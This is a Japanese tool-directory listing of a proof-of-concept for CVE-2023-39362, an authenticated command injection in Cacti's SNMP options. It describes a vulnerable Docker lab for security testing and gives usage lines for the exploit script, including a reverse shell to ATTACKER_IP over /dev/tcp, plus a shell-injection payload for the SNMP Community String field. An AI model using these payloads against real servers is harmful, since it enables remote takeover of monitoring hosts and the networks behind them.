Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — CVE-2023-39362の概念実証エクスプロイト。CactiのSNMPオプションにおける認証済みコマンドインジェクションです。テスト用の脆弱性のあるDocker環境と、リバースシェル機能を備えた自動エクスプロイト用のPythonスクリプトが含まれています。 | Kitploit
ツール/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングラボと実践
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

CVE-2023-39362-cacti-snmp-command-injection-poc

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-39362の概念実証エクスプロイト。CactiのSNMPオプションにおける認証済みコマンドインジェクションです。テスト用の脆弱性のあるDocker環境と、リバースシェル機能を備えた自動エクスプロイト用のPythonスクリプトが含まれています。

リポジトリを見る
22年前未レビュー

Cacti(CVE-2023-39362)のコマンドインジェクション脆弱性 - PoC

このリポジトリは以下のリポジトリからフォークされています: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cactiは、オープンソースの運用監視および障害管理フレームワークであり、ユーザーコミュニティの動的なニーズに応えるために継続的に進化しています。

バージョン1.2.24において、CVE-2023-39362としてマークされた潜在的なセキュリティ脆弱性が特定されました。特定の条件下で、認証された特権ユーザーがDeviceのSNMPオプションの欠陥を悪用し、悪意のある文字列を使用してコマンドインジェクションを引き起こす可能性があります。この悪用により、認証されたリモートコード実行が基盤となるサーバー上で発生します。

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

この脆弱性の影響は深刻であり、認証された権限を持つ悪意のある行為者がCactiをホストするサーバーの完全性を侵害する可能性があります。この侵害は、ネットワーク内の他のホスト、特にCactiによって監視されているホストへの不正アクセスのゲートウェイとなる可能性があります。

これは、Cactiの脆弱性(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。

警告!

このアプリケーションには重大なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップがあり隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)を使用することを推奨します。このアプリケーションをインターネットに公開されているサーバーにアップロードしないでください。それらのサーバーは侵害されます。

免責事項

私は、誰かがこのアプリケーションを使用する方法について一切責任を負いません。このアプリケーションの唯一の目的はCVE-2023-39362エクスプロイトのテストシナリオであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールを介してサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物(複数可)の責任です。**

使用方法

1. 環境のセットアップ

環境をセットアップする手順は以下の通りです:

  1. docker compose up -dを実行してコンポジションを起動します。
  2. ブラウザでhttp://127.0.0.1/cactiにアクセスして、Cacti初期化ウィザードを開始し、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
  3. デフォルトの認証情報はadmin/adminです。
  4. ウィザード中はすべてのボタンで"Next"を押し、オプションを適宜選択してください。デフォルト設定で問題なく、必須の前提条件はすべて満たされているはずです。
  5. インストール後、adminとしてログインします。
  6. "Console" > "Configuration" > "User"に移動します。
  7. guestユーザーをクリックします。
  8. それを"有効"にし、パスワードを設定し、必要に応じて"次回ログイン時にパスワード変更"を無効にします。
  9. "Save"ボタンをクリックします。
  10. "Permissions"セクションに移動します。
  11. "General Administration"の下で、"Console Access"と"Sites/Devices/Data"を有効にします。
  12. "Save"ボタンをクリックします。
  13. ログアウトし、guestとして再ログインしてエクスプロイトを試します。

Cactiの公式インストールガイドはこちらにあります。

環境を破棄するには、docker compose downコマンドを使用します。

2. エクスプロイトスクリプトの実行

(これは悪用のための1つの可能な経路にすぎません)

リモートサーバーでコマンドを実行します:

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

リバースシェルを開く:

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. 手動による悪用

  1. "Console" > "Create" > "New Device"に移動します。
  2. SNMPバージョン1または2をサポートするデバイスを作成します。
  3. デバイスに以下のテンプレートの1つ以上を含むグラフがあることを確認します:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (テンプレート"Net-SNMP Device"からデバイスを作成すると、グラフの前提条件を満たせます)
  4. "SNMP Options"の"SNMP Community String"フィールドに、次のような値を使用します:public\' ; touch /tmp/proof ; \'。
  5. "Create"ボタンをクリックします。
  6. /tmpの下に作成されたファイルが存在することを確認します。

リバースシェルを取得するには、以下のようなペイロードを使用できます。

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

根本原因

脆弱性の詳細な根本原因は、元のセキュリティアドバイザリまたは原作者のブログ記事で入手できます。

著者

  • Antonio Francesco Sardella - 脆弱性報告者 - m3ssap0
  • Akos Jakab - Pythonスクリプトによる悪用の自動化 - jakabakos

ライセンス

このプロジェクトはUnlicenseの下でライセンスされています - 詳細はLICENSEファイルを参照してください。

ツールをダウンロード